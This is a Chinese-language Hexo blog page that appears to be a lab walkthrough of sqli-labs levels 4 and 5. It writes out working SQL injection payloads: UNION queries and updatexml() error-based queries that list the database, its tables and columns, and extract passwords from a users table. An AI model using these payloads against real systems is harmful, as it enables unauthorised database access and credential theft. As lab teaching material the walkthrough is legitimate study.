
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title> - Hexo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="
helloless 4第四关里通过报错可以发现 id&amp;#x3D;1，id&amp;#x3D;1‘，id&amp;#x3D;1’） 都可以出现正确结果，然而当我们输入id&amp;#x3D;1“时候出现了报错 

根据报错,"> 
    <meta name="author" content="John Doe"> 
    <link rel="alternative" href="atom.xml" title="Hexo" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
    
    
    <meta name="twitter:card" content="summary"/>
    <meta name="twitter:title" content=" - Hexo"/>
    <meta name="twitter:description" content="
helloless 4第四关里通过报错可以发现 id&amp;#x3D;1，id&amp;#x3D;1‘，id&amp;#x3D;1’） 都可以出现正确结果，然而当我们输入id&amp;#x3D;1“时候出现了报错 

根据报错,"/>
    
    
    
    
    <meta property="og:site_name" content="Hexo"/>
    <meta property="og:type" content="object"/>
    <meta property="og:title" content=" - Hexo"/>
    <meta property="og:description" content="
helloless 4第四关里通过报错可以发现 id&amp;#x3D;1，id&amp;#x3D;1‘，id&amp;#x3D;1’） 都可以出现正确结果，然而当我们输入id&amp;#x3D;1“时候出现了报错 

根据报错,"/>
    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 6.1.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Hexo</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle"></h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title"></h1>
        <div class="stuff">
            <span>三月 31, 2022</span>
            

        </div>
        <div class="content markdown">
            <hr>
<h2 id="hello"><a href="#hello" class="headerlink" title="hello"></a>hello</h2><h2 id="less-4"><a href="#less-4" class="headerlink" title="less 4"></a>less 4</h2><p>第四关里通过报错可以发现 id&#x3D;1，id&#x3D;1‘，id&#x3D;1’） 都可以出现正确结果，然而当我们输入id&#x3D;1“时候出现了报错 </p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/helloworld/master/less4-5/less4-1.png" alt="图片"></p>
<p>根据报错我们分析一下错误内容  </p>
<p>‘“1”“） limit 0，1’</p>
<p>减去‘’部分我们可以获得 “1“”）这个信息 那么就可以得知我们的sql语言是  select from where id&#x3D;（”id“）这样的信息，那么我们输入id&#x3D;1”)加上–+来忽略后面的”）并且插入我们的查询代码，继续用union查询来查询</p>
<p>先查库名 先让id值等于一个不可能的数字-1 执行后面的语句  id&#x3D;-1“）union select 1,2,database() –+</p>
<p>再查询表名字 ?id&#x3D;-1”) union select 1,2, group_concat(table_name) from information_schema.tables where table_schema&#x3D;’security’ –+</p>
<p>再查询 所要找的表里面的列 ?id&#x3D;-1”) union select 1,2, group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’ –+</p>
<p>得到了有三个列 分别是 id admin password 查询账号密码  ?id&#x3D;-1”) union select 1,2, group_concat(password）from security.users –+  最终得到结果，不再进行演示，毕竟这个问题的难点全在一开始对于错误的解释 需要我们分析出来争取的sql查询语句 </p>
<h2 id="less5"><a href="#less5" class="headerlink" title="less5"></a>less5</h2><p>第五题 刚开始就是这个样子 说明使用盲注入或者报错注入了，由于手工注入的不方便性，这次使用报错注入。</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/helloworld/master/less4-5/less5-1.png"></p>
<p>这边就要提到 updatexml()这个函数了，其本意就是一个更新xml的函数，具体的格式是updatexml(目标xml内容，xml文档路径，更新的内容)</p>
<p>其中xml内容无关紧要，我们用1来代替 路径我们用一个子查询来报错引出我们所需要的东西，用concat来拼接（0x7e，子查询，0x7e），而更新的内容也不是什么重要的内容，报错注入主要是想让sql数据库来在一些重要的错误时爆出对哦我们有用的消息</p>
<p>先用之前学过的判断id的类型 再用updatexml来进行报错注入</p>
<p>?id&#x3D;1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) –+</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/helloworld/master/less4-5/less5-3.png"></p>
<p>从而得到库名 security  </p>
<p>而查表的时候，内容与之前联合查询差不多，唯独加上了limit 的限制 因为他限制只有一行，所以我们从limit 0，1 一直实验到我们所需要的名上 </p>
<p>?id&#x3D;1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 3,1),0x7e),1) –+ 查到users表</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/helloworld/master/less4-5/less5-4.png"></p>
<p>继续查找列表</p>
<p>?id&#x3D;1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema&#x3D;’security’ limit 3,1),0x7e),1) –+</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/helloworld/master/less4-5/less5-5.png"></p>
<p>找到密码，但需要一个个的看</p>
<p>?id&#x3D;1’ and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) –+</p>
<p><img src="https://raw.githubusercontent.com/TJ-deng/helloworld/master/less4-5/less5-6.png"></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link"
		data-enable="false"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
</div>


    </div>
</div>
</body>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
